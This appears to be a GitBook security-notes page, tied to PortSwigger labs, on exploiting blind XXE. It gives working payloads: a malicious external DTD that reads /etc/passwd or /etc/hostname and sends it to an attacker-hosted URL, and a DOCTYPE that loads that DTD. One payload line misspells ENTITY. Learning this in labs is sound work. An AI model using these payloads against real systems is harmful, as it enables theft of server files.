Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  1. WebApp Security
  2. XXE Attacks
  3. Blind XXE Attacks

Exploitation

PreviousIdentificationNextBlind XXE to LFI

Last updated 2 years ago

What we did so far was just to ping back our Burp Collab from the remote host, but it actually doesn't tell us how to go on and exploit this vulnerability.

  • Every attacker wants to retrieve any sort of interesting information, this can be achieved using this Blind XXE

  • But this attack is only possible, when the attacker hosts a malicious DTD on a system that they control

And then invoking the external DTD from within the in-band XXE payload.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENITTY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://ATTACKER IP/?x=%file;'>">
%eval;
%exfiltrate;

  1. It defines an XML parameter entity called file, which contains /etc/passwd

  2. It again defines another XML parameter called eval, containing a dynamic declaration of another entity called exfiltrate

  3. The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the file entity within the URL query string

  4. It uses the eval entity, which invokes the exfiltrate entity to be performed

  5. It uses the exfiltrate entity, so that its value is evaluated by requesting the specified URL

The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own webserver

http://BURP-COLLABORATOR/malicious.dtd

Finally the attacker must modify the request to be something like this,

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER IP/malicious.dtd"> %xxe; ]>
PortSwigger Exercises

So we just managed to exfiltrate the hostname using a malicious external DTD

When we try to ping back our Burp collab the usual way, it doesn't work so we'll have to try another way to get it

Luckily, PortSwigger labs provide us with an exploit server where we can craft and store our own payload

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLAB/exploit.dtd'>">
%eval;
%exfil;

When we store this payload, notice the URL -> It gives us our malicious DTD

Now we can exploit it the normal way,

<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "https://THE-MALICIOUS-DTD-URL/exploit.dtd"> %xxe; ]>

And now when we Poll Back, we notice there is a DNS and an HTTP Response Checking out the HTTP request gives us a GET method containing the hostname

GET /?x=<HOSTNAME>

Note

/etc/passwd doesn't work because of the newline characters in the file, Some XML parsers fetch the URL in the external entity definition using an API that validates the characters that are allowed to appear within the URL.

  • It is best to use FTP:// instead of HTTP://

That's why we use files like /etc/hostname